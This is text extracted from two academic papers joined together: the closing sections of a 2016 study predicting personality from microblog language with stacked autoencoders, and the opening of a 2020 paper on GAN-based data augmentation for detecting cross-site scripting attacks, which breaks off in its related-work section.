http://dx.doi.org/10.7717/peerj-cs.81 In order to extract the temporal information from massive high-dimensional digital vectors, Fourier time-series analysis is considered. Concretely, we conduct FFT for each vector. Through FFT, the amplitudes calculated include frequency information, and former 8 maximum amplitudes are selected to constitute a vector as the representation of each word category. Finally, linking the vectors of each category in series, we can obtained a linguistic vector of 704 length corresponding to each user ID. In our experiment, we use 1,552 users’ blogs published in three years as data for preliminary study. Each user’s linguistic behavior is represented as vector form through FFT based on SCLIWC. Data for personality prediction In order to verify that the deep learning algorithm is an effective method for extracting a representation of a user’s Sina microblog linguistic behaviors, we built a personality prediction model based on linguistic behavior feature vectors. The personality prediction model is constructed by a linear regression algorithm. For each volunteer, five linguistic behavior feature vectors corresponding to five traits of personality are obtained by feature learning models, respectively. The training process of the personality prediction model is supervised, so users’ five scores of five personality traits in the Big Five questionnaire are taken as their labels of the corresponding linguistic behavior feature vectors. METHODS Unsupervised feature learning based on Stacked Autoencoders Feature learning can be seen as a process of dimensionality reduction. In order to improve the computational efficiency, for all traits of personality, we utilize the relatively simpler form of artificial neural network, autoencoder (Bengio, 2009). Figure 1 shows the basic structure of an autoencoder. Basically, for an autoencoder, the input and output own the same dimensions, both of them can be taken as X but, through mathematical transfor- mation, the input and output may be not completely equal. In Fig. 1, X denotes input and X ′ denotes output. The variable in hidden layer Y is encoded through X by Eq. (4). Y = fθ(X)= s(W T X+b)= s ( n∑ i=1 Wixi+b ) (4) s(z)= 1 1+exp(−z) . (5) In Eq. (4), {W,b} are parameters which can be obtained through training. s(z) is the Sigmoid activation function of hidden layers which is defined in Eq. (5). In addition, a reconstructed vector X ′ in input vector space could be obtained by mapping the result of hidden layer Y back through a mapping function, X ′=gθ′(Y )= s ′(W ′T Y +b′)= s ( n∑ i=1 W ′i yi+b ′ ) . (6) For an autoencoder, if we want the mapping result Y as another representation of input X, it is assumed that the input X and the reconstructed X ′ are the same. According to this Liu and Zhu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.81 6/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.81 Figure 1 The basic structure of an autoencoder. assumption, the training process of an autoencoder could be conducted and the parameters of the autoencoder are adjusted according to minimize the error value L between X and X ′, as shown in the Eq. (7) and Fig. 2. Due to the fact that the error is directly computed based on the comparison between the original input and the reconstruction obtained, the whole training process is unsupervised. L(X;W,b)=‖X ′−X‖2. (7) Several autoencoders are stacked to initialize the deep architectures layer by layer as Fig. 3. Let the hidden layer of kth layer be used as the input of (k+1)th layer. We used greedy layer-wise training to obtain the optimal parameters {W,b} for a Stacked Autoencoder model. That is, the parameters of each layer are trained individually while freezing parameters for the remainder of the model. The output of the nth layer Y n is used as the input of the subsequent (n+1)th layer to trained the parameters. The number of layer would be decided according to the optimal value of many experiments. Adjusting the number of layers, and the number of layer corresponding the better performance of prediction model would be set as the optimal number of layer. Then, we take the output of the last layer as the abstract representation of the original linguistic behavior information. Figure 3 shows the structure of our model. For different personality factors, the number of layers and the number of units in each layer are different. The details are presented on the left of Fig. 3. For ‘‘A,’’ ‘‘C’’ and ‘‘N,’’ there are one hidden layers in the SAE, and the Liu and Zhu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.81 7/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.81 Figure 2 The training principle diagram of an autoencoder. Figure 3 The deep structure of our prediction model. The left table shows the details of SAE of the different personality factors. feature learning model are three layers in total. For ‘‘E’’ and ‘‘O,’’ there are two hidden layers in the SAE. In our experiments, 1,552 users’ content information of Sina microblog are used as training dataset, and the unsupervised feature learning models corresponding different personality traits are trained respectively. That is, we could obtain five feature learning models in total. For each trait, there will be corresponding linguistic behavior feature vectors extracted from social network behavior data actively. Finally, based on the Big Five questionnaire, for each user, we could obtained five scores (SA, SC, SE, SN , SO) corresponding to ‘‘A,’’ ‘‘C,’’ ‘‘E,’’ ‘‘N,’’ ‘‘O’’ five factors, respectively. These scores are used to label corresponding linguistic behavior feature vectors for personality prediction models. Personality prediction model based on linear regression Personality prediction is a supervised process. The linguistic behavior feature vectors are labeled by the corresponding scores of the Big Five questionnaire. For five traits of personality, we utilized the linear regression algorithm to build five personality prediction models in totally. Take one trait of personality as an example, the linguistic behavior feature vectors are represented by X ={Xi|Xi=(xi1,xi2,...,xim)} n i=1, (8) Liu and Zhu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.81 8/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.81 in which, n is the number of samples, n=1,552, and m denotes the number of dimensions of the input vector. The scores of the Big Five questionnaire are taken as the labels, Y ={yi} n i=1. (9) The general form of linear regression is yi=ω1xi1+ω2xi2+···+ωmxim+εi,(i=1,2,...,n). (10) We trained five personality prediction models based on linear regression algorithm using corresponding linguistic behavior feature vectors and labels. RESULTS In Experiments, we collect 1,552 users’ Sina microblog data in total. The linguistic behavior of users are quantified based on SCLIWC, and the temporal characteristics are calculated through FFT. Then, we utilize deep learning algorithm to construct feature learning models, which could extract objective and comprehensive representation of linguistic behaviors from the temporal sequence. Finally, personality prediction model is trained by the linear regression algorithm based on linguistic behavior feature vectors. Evaluation measures In this paper, we conducted preliminary study about constructing microblog behavior representation for predicting social media user’s personality. The five factors of personality are all tested. We use the Pearson product-moment correlation coefficient (r) and Root Mean Square Error (RMSE) to measure the quality of different behavior feature representation methods. The computational formulas of two measurements are shown in Eqs. (11) and (12) respectively. In Eq. (11), Cov(Y,Y ′) denotes the covariance of Y and Y ′, and Var(Y ) and Var(Y ′) represents the variances of the real score Y and prediction score Y ′ respectively. When r > 0, it means the results of questionnaire and prediction model have a positive correlation. In contrast, r < 0 means negative correlation. The absolute value is greater, the higher is the degree of correlation. In psychology research, we use Cohen’s conventions (Cohen, 1988) to interpret the Pearson product-moment correlation coefficient. r ∈[0.1,0.3) represent a weak or small association and r ∈[0.3,0.5) indicates a moderate correlation between two variables. In Eq. (12), i is the sequence number of sample and n is the total number of samples, n=1,552. In the Big Five questionnaire used in our experiments, there are 44 questions in all. The score ranges of ‘‘A,’’ ‘‘C,’’ ‘‘E,’’ ‘‘N,’’ ‘‘O’’ are [9,45], [8,40], [9,45], [8,40], [10,50] respectively. The value of RMSE shows the average difference between our prediction results and the scores of questionnaire. The smaller is the value of RMSE, the better is the performance of prediction model. r =Cor(Y,Y ′)= Cov(Y,Y ′) √ Var(Y )Var(Y ′) (11) RMSE = √∑n i=1(yi−y ′ i) 2 n (12) Liu and Zhu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.81 9/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.81 Table 1 The comparison of prediction results in the Pearson correlation coefficient. Attributes ra rc re rn ro Attribute 1 (Original) 0.1012 0.1849 0.1044 0.0832 0.181 Attribute 2 (PCA) 0.1106 0.2166 0.1049 0.1235 0.1871 Attribute 3 (Stepwise) 0.1223 0.2639 0.1698 0.1298 0.2246 Attribute 4 (Lasso) 0.1209 0.2068 0.0788 0.0934 0.1136 Attributes SAE 0.2583 0.4001 0.3503 0.3245 0.4238 Table 2 The comparison of prediction results in RMSE. Attributes RMSEa RMSEc RMSEe RMSEn RMSEo Attribute 1 (Original) 5.6538 6.1335 4.9197 6.5591 7.0195 Attribute 2 (PCA) 5.1628 5.6181 5.6781 5.9426 6.4579 Attribute 3 (Stepwise) 4.8421 5.3495 5.276 5.6904 6.1079 Attribute 4 (Lasso) 5.8976 6.7471 6.4940 5.4241 6.0938 Attributes SAE 4.7753 5.339 4.8043 5.6188 5.1587 Table 3 The comparison of dimensionality of different feature vector. Attributes Da Dc De Dn Do Attribute 1 (Original) 704 704 704 704 704 Attribute 2 (PCA) 250 203 250 310 250 Attribute 3 (Stepwise) 47 32 56 47 32 Attribute SAE 400 400 300 400 300 Experiment results In comparison experiments, we utilized five different kinds of attributes to train and build the personality prediction model. The five kinds of attributes include the attributes selected by artificial statistical method without feature selection (denoted by Attribute 1), the attributes selected from Attribute 1 by Principal Component Analysis (PCA) (Dunteman, 1989) (denoted by Attribute 2), the attributes selected from Attribute 1 by Stepwise (denoted by Attribute 3), the attributes selected from Attribute 1 by Lasso (denoted by Attribute 4) and linguistic behavior feature vector obtained based on Stacked Antoencoders (SAE) (denoted by Attribute SAE). PCA is a kind of unsupervised feature dimension reduction method, and Stepwise is usually used as a kind of supervised feature selection method. LASSO is a regression analysis method which also perform feature selection. For different kinds of attributes, the personality prediction models are all built by a linear regression algorithm. In order to obtain the stable model and prevent occurrence of overfitting for each factor of personality, we use 10-fold cross validation and run over 10 randomized experiments. Finally, the mean of 10 randomized experiments’ results is recorded as the final prediction result. The comparison of prediction results of five personality factors using three kinds of attributes are shown in Tables 1 and 2. Table 3 shows the dimensionality of different kinds of feature vectors. The letters in subscript ‘‘a,’’ ‘‘c,’’ ‘‘e,’’ ‘‘n,’’ ‘‘o’’ indicate different personality factors respectively. Liu and Zhu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.81 10/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.81 DISCUSSION This study explore the relevance between users’ personality and their social network behaviors. The feature learning models are built to perform an unsupervised extraction of the representations of social network linguistic behaviors. Compared with the attributes obtained by some supervised behavior feature extraction methods, the LRFV is more objective, efficient, comprehensive and universal. In addition, based on LRFV, the accuracy of the personality prediction model could be improved. The performance of personality prediction model The results in Tables 1 and 2 show that the linguistic behavior feature vectors learned through Stacked Autoencoders perform better than other attributes in both the Pearson correlation coefficient and RMSE. When using Attribute SAE, the Pearson correlation coefficients re =0.2583, which represent a small correlation. For‘‘E,’’ ‘‘N,’’ ‘‘C’’ and ‘‘O,’’ re =0.3503, rn =0.3245, rc =0.4001 and ro =0.4238, which means that the prediction results of ‘‘E,’’ ‘‘N,’’ ‘‘C’’ and ‘‘O’’ correlate with the results of questionnaire moderately. It is concluded that personality prediction based on the linguistic behavior in social network is feasible. Besides, the traits of conscientiousness and openness could be reflected in the network linguistic behavior more obviously. Compared with other feature extraction methods, our proposed method performs better. When using the original feature vector (Attributes 1), the prediction results r are all less than 0.2. When using another kind of unsupervised feature dimension reduction method (Attributes 2), except for ‘‘C,’’ others are also less than 0.2. Attributes 3, which is obtained by using a kind of supervised feature selection method, the prediction results r are also not ideal. Similarly, considering RMSE of every personality traits, the prediction model also obtain better results based on the linguistic behavior feature vectors. Besides, we compared the time and memory consuming of prediction when using SAE and PCA to reduce the dimensionality of features respectively in Table 4. The experiments were conducted on a DELL desktop with an Intel Core 3.30 GHz CPU and 12G memories. The average time consuming denotes the average time cost for predicting one personality factor of one sample. The average memory consuming denotes the memory usage percentage when running the prediction model. Although PCA performed better in the time and memory consuming, the prediction results of linguistic behavior feature vectors were outstanding. Usually, the high-powered computing server could offset the deficiency of time and memory consuming. Parameters selection Activation function There are many kinds of activation function in neural network, such as Sigmoid, Tanh, Softmax, Softplus, ReLU and Linear. Among them, Sigmoid and Tanh are used commonly. In experiment, we utilized both of them to construct the feature learning model, and the comparative results (Table 5) showed that when using Sigmoid as activation function of hidden layers, the prediction results are a bit better. Liu and Zhu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.81 11/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.81 Table 4 The comparison of time and memory consuming of different feature vector. Attributes Average time consuming Average memory consuming Attribute 2 (PCA) 3ms 56% Attributes SAE 12ms 81% Table 5 The comparison of prediction results when using different activation function. Activation function ra rc re rn ro Sigmoid 0.2583 0.4001 0.3503 0.3245 0.4238 Tanh 0.2207 0.3338 0.3216 0.2696 0.3503 Figure 4 The comparison of prediction results using linguistic feature vectors with different dimen- sionality. (A) The comparison of r. (B) The comparison of RMSE. The dimensionality of linguistic behavior feature vector For each personality trait, the dimensionality of linguistic behavior feature vector is set according to the optimal result of prediction model obtained from repeated experiments, and the comparison of r and RMSE when using linguistic behavior feature vectors with different dimensionality are presented in Figs. 4A and 4B, respectively. The Pearson correlation coefficient reflects the correlation degree between two variables. If the change tendencies of two variables are more similar, the correlation coefficient is higher. Root Mean Square Error reflects the bias between the real value and prediction value. For a dataset, the Pearson correlation coefficient and Root Mean Square Error may not be direct ratio. In practical applications, the trend of the psychological changes is more necessary. So, when adjusting the optimal parameters, we give priority to Pearson correlation coefficient. For ‘‘A,’’ ‘‘C’’ and ‘‘N,’’ prediction models perform better when the dimensionality of feature vector is 400. For ‘‘E’’ and ‘‘O,’’ we could obtain the better results when the dimensionality of feature vector is 300. Differences in modeling performance across personality traits Through analysing the results of experiments, we summarize that Agreeableness correlate with users’ social network linguistic behaviors relative weakly than the other personality traits. The correlation between openness and users’ social network linguistic behaviors is highest of all. We could identify whether the users own higher scores in openness or not through their blogs published in social network platform, most likely because the Liu and Zhu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.81 12/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.81 people with high scores in openness usually prefer to publicly express their thoughts and feelings. Similarly, conscientiousness is moderately correlate with social network linguistic behaviors. And for conscientiousness, there are significant differences of using the words belonging to the categories of family, positive emotion and so on. The future work In this paper, we has carried on some preliminary study to explore the feasibility of using deep learning algorithm to construct linguistic feature learning model. More work will be conducted further. Millions of users’ social media are being downloaded. In feature extraction, the massive data will be used to train the unsupervised feature learning model. Besides, a new round of user experiment is progressing. We would obtain a new set of labeled data to improve our personality prediction method. The study is of great significance. It could provide new quantitative and analytical methods for the social media data, and a new perspective for real-time assessment of Internet users’ mental health. CONCLUSIONS In this paper, we utilized a deep learning algorithm to investigate the correlations between users’ personality traits and their social network linguistic behaviors. Firstly, the linguistic behavior feature vectors extracted unsupervised using Stacked Autoencoders models actively. Then, the personality prediction models are built based on the linguistic behavior feature vectors by linear regression algorithm. Our comparison experiments are conducted on five different kinds of attributes, and the results show that the linguistic behavior feature vectors could improve the performance of personality prediction models. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received support from the Young Talent Research Fund (Y4CX103005), National Basic Research Program of China (2014CB744600), and CAS Strategic Priority Research Program (XDA06030800). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Young Talent Research Fund: Y4CX103005. National Basic Research Program of China: 2014CB744600. CAS Strategic Priority Research Program: XDA06030800. Competing Interests The authors declare there are no competing interests. Author Contributions • Xiaoqian Liu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. Liu and Zhu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.81 13/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.81 • Tingshao Zhu conceived and designed the experiments, contributed reagents/material- s/analysis tools, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability. The raw data has been supplied as Data S1. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.81#supplemental-information. REFERENCES Bengio Y. 2009. Learning deep architectures for AI. Foundations and Trends in Machine Learning 2(1):1–127 DOI 10.1561/2200000006. Bengio Y, Courville A, Vincent P. 2013. Representation learning: a review and new perspectives. IEEE Transactions on Pattern Analysis and Machine Intelligence 35(8):1789–1828 DOI 10.1109/TPAMI.2013.50. Chen J, Hu B, Moore P, Zhang X, Ma X. 2015. Electroencephalogram-based emotion as- sessment system using ontology and data mining techniques. Applied Soft Computing 30:663–674 DOI 10.1016/j.asoc.2015.01.007. Ciresan D, Meier U, Schmidhuber J. 2012. Multi-column deep neural networks for image classification. In: IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 3642–3649. Cohen J. 1988. Statistical power analysis for the behavioral sciences. Vol. 2. Hillsdale: Lawrence Earlbaum Associates. Costa PT, McCrae RR. 1992. Revised NEO personality inventory and NEO five-factor inventory (NEO-FFI) manual. Odessa: Psychological Assessment Resources. Dunteman GH. 1989. Principal components analysis. Sage University paper series on Quantitative Applications in the Social Sciences, series no. 07-069. Beverly Hills: Sage Publications. Funder D. 2001. Personality. Annual Review of Psychology 52:197–221 DOI 10.1146/annurev.psych.52.1.197. Gao R, Hao B, Li H, Gao Y, Zhu T. 2013. Developing simplified Chinese psychological linguistic analysis dictionary for microblog. In: International conference on brain health informatics. Golbeck J, Robles C, Edmondson M, Turner K. 2011. Predicting personality from twitter. In: IEEE third international conference on Privacy, Security, Risk and Trust (PASSAT) and IEEE third inernational conference on social computing. Passat/socialcom, Privacy, Security, Risk & Trust, 149–156. Golbeck J, Robles C, Turner K. 2011. Predicting personality with social media. Extended Abstracts on Human Factors in Computing Systems 253–262. Liu and Zhu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.81 14/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.81/supp-1 http://dx.doi.org/10.7717/peerj-cs.81#supplemental-information http://dx.doi.org/10.7717/peerj-cs.81#supplemental-information http://dx.doi.org/10.1561/2200000006 http://dx.doi.org/10.1109/TPAMI.2013.50 http://dx.doi.org/10.1016/j.asoc.2015.01.007 http://dx.doi.org/10.1146/annurev.psych.52.1.197 http://dx.doi.org/10.7717/peerj-cs.81 Huang CL, Chung CK, Hui N, Lin YC, Yi-Tai S, Lam BCP, Chen WC, Bond MH, Pennebaker JW. 2012. The development of the Chinese linguistic inquiry and word count dictionary. Chinese Journal of Psychology 55:185–201. Huang GB, Lee H, Learned-miller E. 2012. Learning hierarchical representations for face verification with convolutional deep belief networks. In: IEEE conference on computer vision and pattern recognition, 2518–2525. Huijie L, Jia J, Quan G, Yuanyuan X, Jie H, Lianhong C, Ling F. 2014a. Psychological stress detection from cross-media microblog data using deep sparse neural network. In: Proceedings of IEEE international conference on multimedia expo. Piscataway: IEEE. Huijie L, Jia J, Quan G, Yuanyuan X, Qi L, Jie H, Lianhong C, Ling F. 2014b. User- level psychological stress detection from social media using deep neural network. In: Proceedings of the ACM international conference on multimedia. New York: ACM, 507–516. Lima ACES, De Castro LN. 2013. Multi-label Semi-supervised Classification Applied to Personality Prediction in Tweets. In: The 11th Brazilian congress on computational intelligence. 195–203. Loan CV. 1992. Computational Frameworks for the Fast Fourier Transform. SIAM Review 35(1):142–143. Mischel W, Shoda Y, Ayduk O. 2007. Introduction to personality: toward an integration. 8th edition. Wiley Press. Ortigosa A, Carro RM, Quiroga JI. 2013. Predicting user personality by mining social interactions in Facebook. Journal of Computer and System Sciences 80(1):57–71 DOI 10.1016/j.jcss.2013.03.008. Qiu L, Lin H, Ramsay J, Yang F. 2012. You are what you tweet: personality expression and perception on twitter. Journal of Research in Personality 46(6):710–718 DOI 10.1016/j.jrp.2012.08.008. Sibel A, Golbeck J. 2014. Predicting personality with social behavior: a comparative study. Social Network Analysis and Mining 4(159) DOI 10.1007/s13278-014-0159-7. Socher R, Perelygin A, Wu JY, Chuang J, Manning CD, Ng AY, Potts C. 2013. Recursive deep models for semantic compositionality over a sentiment treebank. In: Conference on empirical methods in natural language processing. Tausczik YR, Pennebaker JW. 2010. The psychological meaning of words: LIWC and computerized text analysis methods. Journal of Language and Social Psychology 29(1):24–54 DOI 10.1177/0261927X09351676. Vazire S, Gosling SD. 2004. e-Perceptions: personality impressions based on personal websites. Journal of Personality and Social Psychology 87(1):123–132 DOI 10.1037/0022-3514.87.1.123. Vittorio CG, Claudio B, Laura B, Marco P. 1993. The ‘‘Big Five questionnaire’’: a new questionnaire to assess the five factor model. Personality and Individual Differences 15(3):281–288 DOI 10.1016/0191-8869(93)90218-R. Zhang X, Hu B, Chen J, Moore P. 2013. Ontology-based context modeling for emotion recognition in an intelligent web. World Wide Web-internet and Web Information Systems 16(4):497–513 DOI 10.1007/s11280-012-0181-5. Liu and Zhu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.81 15/15 https://peerj.com http://dx.doi.org/10.1016/j.jcss.2013.03.008 http://dx.doi.org/10.1016/j.jrp.2012.08.008 http://dx.doi.org/10.1007/s13278-014-0159-7 http://dx.doi.org/10.1177/0261927X09351676 http://dx.doi.org/10.1037/0022-3514.87.1.123 http://dx.doi.org/10.1016/0191-8869(93)90218-R http://dx.doi.org/10.1007/s11280-012-0181-5 http://dx.doi.org/10.7717/peerj-cs.81 work_si36pup6v5frdgnsep24cnugs4 ---- Submitted 28 August 2020 Accepted 10 November 2020 Published 14 December 2020 Corresponding author Fawaz Mahiuob Mohammed Mokbal, fawaz@emails.bjut.edu.cn Academic editor Shuihua Wang Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.328 Copyright 2020 Mokbal et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Data augmentation-based conditional Wasserstein generative adversarial network-gradient penalty for XSS attack detection system Fawaz Mahiuob Mohammed Mokbal1,2,*, Dan Wang1,*, Xiaoxi Wang3 and Lihua Fu1 1 College of Computer Science, Faculty of Information Technology, Beijing University of Technology, Beijing, China 2 Faculty of Computer Science, ILMA University, Karachi, Pakistan 3 State Grid Management College, Beijing, China * These authors contributed equally to this work. ABSTRACT The rapid growth of the worldwide web and accompanied opportunities of web applications in various aspects of life have attracted the attention of organizations, governments, and individuals. Consequently, web applications have increasingly become the target of cyberattacks. Notably, cross-site scripting (XSS) attacks on web applications are increasing and have become the critical focus of information security experts’ reports. Machine learning (ML) technique has significantly advanced and shown impressive results in the area of cybersecurity. However, XSS training datasets are often limited and significantly unbalanced, which does not meet well- developed ML algorithms’ requirements and potentially limits the detection system efficiency. Furthermore, XSS attacks have multiple payload vectors that execute in different ways, resulting in many real threats passing through the detection system undetected. In this study, we propose a conditional Wasserstein generative adversarial network with a gradient penalty to enhance the XSS detection system in a low- resource data environment. The proposed method integrates a conditional generative adversarial network and Wasserstein generative adversarial network with a gradient penalty to obtain necessary data from directivity, which improves the strength of the security system over unbalance data. The proposed method generates synthetic samples of minority class that have identical distribution as real XSS attack scenarios. The augmented data were used to train a new boosting model and subsequently evaluated the model using a real test dataset. Experiments on two unbalanced XSS attack datasets demonstrate that the proposed model generates valid and reliable samples. Furthermore, the samples were indistinguishable from real XSS data and significantly enhanced the detection of XSS attacks compared with state-of-the-art methods. Subjects Artificial Intelligence, Computer Networks and Communications, Data Mining and Machine Learning, Security and Privacy, World Wide Web and Web Science Keywords Data augmentation, Conditional-Wasserstein generative adversarial net, Imbalance dataset, XSS Attack, Web applications security How to cite this article Mokbal FMM, Wang D, Wang X, Fu L. 2020. Data augmentation-based conditional Wasserstein generative ad- versarial network-gradient penalty for XSS attack detection system. PeerJ Comput. Sci. 6:e328 http://doi.org/10.7717/peerj-cs.328 https://peerj.com/computer-science mailto:fawaz@emails.bjut.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.328 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.328 INTRODUCTION Over the last decade, the worldwide web has grown exponentially, and web applications are increasingly being deployed to provide sustainable and accessible services to the public. These have attracted the attention of governments, companies, and individuals. Similarly, cyberattacks on web applications are increasing; consequently, increasing the severity of web applications and users’ risks. Cross-site scripting (XSS) attack is one of the prevalent and growing attacks on web applications. Successful XSS attacks lead to various degrees of consequences for users, governments, and businesses. For the user, XSS attacks can be used to steal sensitive user information such as user credentials and session tokens or impersonate the user to carry out authorized actions on behalf of the user. For businesses and governments, XSS attacks can be used to change the appearance or behavior of target websites and steal confidential information. These authorities may face dire consequences, including loss of reputation, legal battles, and financial losses (Deepa & Thilagam, 2016). Cybercriminals exploit security vulnerabilities within web applications often caused by several factors, including the level of application programmers’ experience in security and inheriting vulnerabilities from open-source and third-party packages. These security vulnerabilities could allow cybercriminals to inject malicious content into the HTML trusted pages displayed to end-users (Sarmah, Bhattacharyya & Kalita, 2018). State-of-the-art XSS attack detection systems are applied on the server-side, client-side, or both. The analysis methods used to distinguish between malignant and benign payload could be static, dynamic, or hybrid (Sarmah, Bhattacharyya & Kalita, 2018). However, these methods have limitations, such as low detection rate (DR), high false positive (FP)/negative rates, and often not scalable over time (Mitropoulos & Spinellis, 2017). Therefore, they are inefficient, especially with emerging techniques and evolving forms of XSS payloads developed continuously by cybercriminals (Lekies et al., 2017; Zhou & Wang, 2019). In 2019, XSS attacks became the most widespread attack vectors. Approximately 40% of cyberattacks have been attributed to XSS attacks, according to Precise Security research (Precise Security, 2020), which is expected to increase in the future significantly. Furthermore, the overall number of new XSS vulnerabilities in 2019 (2,023) increased by 79.20% compared with that in 2017 (1,129) as per the National Vulnerabilities Database (National Institute of Standards and Technology, 2020). Additionally, there are various reports and warnings from information security experts in Industrial Control Systems Vulnerabilities Statistics (Andreeva et al., 2016). Many studies in related literature used FP as metrics to measure model accuracy instead of DR, which reveals the effect of unbalanced data and can be expensive in the cybersecurity domain (Elkan, 2001). Technically, the DR represents the effective detection of attacks and is a critical factor in detection systems. When the DR is not clearly defined, it raises concerns about the cybersecurity system’s effectiveness. Consequently, there is an increase in the number of major risks unidentified by various tools/models (Deepa & Thilagam, 2016; Lekies et al., 2017). Existing machine learning (ML) techniques are proven to be highly efficient in handling security challenges. The algorithms are trained using data of previously known behaviors (supervised learning), and each class of behavior is recognized to be either anomalous or Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 2/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.328 legitimate. However, web pages are a mixture of multiple languages such as JavaScript and HTML, which were formally unstandardized, enabling the use of various coding techniques that are susceptible to attacks. Therefore, XSS attacks have peculiar and irregular characteristics; further, the volume of labeled data on XSS attacks with up-to-date cases is limited and highly unbalanced (Obimbo, Ali & Mohamed, 2017; Nunan et al., 2012; Mokbal et al., 2019). Consequently, applying most standard ML algorithms to XSS data in the straightforward are unsuitable and challenging compared with other well-developed clean data domains (Vluymans, 2019; Mokbal et al., 2019). To our best knowledge, the limited and unbalanced data of XSS cyber-attack based on ML learning have not been addressed in the literature, which is worth to study. The detection system is invariably affected by the class imbalances problem. Specifically, ML algorithms focus on maximizing accuracy, which technically means that all misclassified errors are handled equally and uniformly, implying that the algorithms do not handle unbalanced datasets even if they are accurate and clean (Vluymans, 2019). A learning algorithm may discard instances of the minority class in the dataset in such a problem. The attack samples are often of the minority class and handled as noise while recognizing only samples of the majority class (Buda, Maki & Mazurowsk, 2018). Therefore, the ML-based model design should consider the dataset’s weight and evaluation criteria (Vluymans, 2019). The traditional methods for addressing the challenges of limited and unbalanced data that could be used are oversampling the minority class or undersampling the majority class. Yet, each method has its limitations. Oversampling can lead to overfitting, whereas undersampling may discard useful data, which subsequently leads to loss of information (Vluymans, 2019). To mitigate the challenges of limited and highly unbalanced XSS attack dataset, we proposed a data augmentation method based on the conditional GAN and Wasserstein GAN with a gradient penalty (C-WGAN-GP). Our proposed method aims to achieve the minority class’s oversampling using a more robust generative approach to rebalancing the training dataset by adding identical and valid samples to the minority class. Samples generated based on the minority class’s overall distribution are generalized using the C- WGAN-GP generative network instead of local information as the traditional methods do. The generative adversarial network (GAN) (Goodfellow et al., 2014) is considered a potential solution to the challenges described above. It is a type of a deep generative model that aims to learn the joint probability distribution of samples and labels from training data, which can be further used for several applications such as predictor training, classifier, and data augmentations (Pan et al., 2019). The main contributions of this study can be summarized as the following: • We proposed the WGAN-based adversarial training with conditional minority class (attack labels) to generate valid and indistinguishable samples of real XSS attack data. To preserve various features covering the data space range and enable the generator to learn the original data space distribution, we pass the upper and lower data space to the conditional generator. Furthermore, the augmented data are not added to the Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 3/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.328 real training data arbitrarily; the process is performed only if the generated sample x̃ satisfies the critic. Thus, it ensures that the added samples are identical to the real data and improving the training data. • We further propose a boosting classification model using the XGBoost algorithm trained on the augmented training dataset generated by C-WGAN-GP, which significantly improved the attack detection efficiency. • The proposed method is evaluated with two real and large unbalance XSS attack datasets. Experiments show that our proposed augmentation framework generates valid samples indistinguishable from real XSS data and outperformed state-of-the-art methods with XSS attacks detection. Although we presented the proposed framework formally for XSS attack detection, it can be generalized and extended to other applications areas. The rest of this study is presented as follows: In ‘Related Work’, we gave the most related literature. In ‘Proposal and experimental methodology’, we introduced the model design and the methodology of experiments. We presented the results and discussion in ‘Results and Discussion’. ‘Conclusions’ is the conclusion and future work. RELATED WORK Web applications have become part of our everyday lives and have achieved significant success and substantial financial gains for organizations; consequently, ML-based XSS attacks detection has gained much attention from the research community. However, there are challenges in using ML-based methods, including finding or designing an adequate, accurate, and balanced dataset designed for ML algorithms usage. Unfortunately, there is no public and standard dataset intended for this purpose (Obimbo, Ali & Mohamed, 2017; Nunan et al., 2012; Mokbal et al., 2019), where researchers can create their datasets based on their requirements and orientation. The authors (Rathore, Sharma & Park, 2017) proposed a classifier model against XSS attacks for social sites using their dataset, which consists of 100 samples collected from XSSed, Alexa, and Elgg. They applied multiple algorithms and achieved the best results by using the random forest algorithm. However, the dataset used to train the algorithm is small, possibly selective, and may not reflect the real attacks. Moreover, the DR score of 0.949 was considered inadequate. Wang et al. (2017) proposed a hybrid analysis method to detect malicious web pages by extracting and using three sets of features: URL, HTML, and JavaScript. The reported DR was 88.20%, implying that the method fails to detect 11.80% of real threats. Another research work (Wang, Cai & Wei, 2016) proposed a deep learning model (stacked denoising autoencoder) to detect malicious codes. They used sparse random projections to reduce the dimensions of the data. Despite the model’s complexity, the DR score was 0.9480, which is inadequate for detecting malicious attacks. Moreover, the model has a high FP rate of 4.20% with a high computational cost. Wang et al. (2014) used an ensemble learning method (ADTree and AdaBoost) to detect XSS attacks. However, the DR score of 0.941 is inadequate, with a high FP rate of 4.20%. Mokbal et al. (2019) proposed a scheme based on dynamic feature extraction and Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 4/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.328 deep neural network to detect XSS attacks. Using their developed 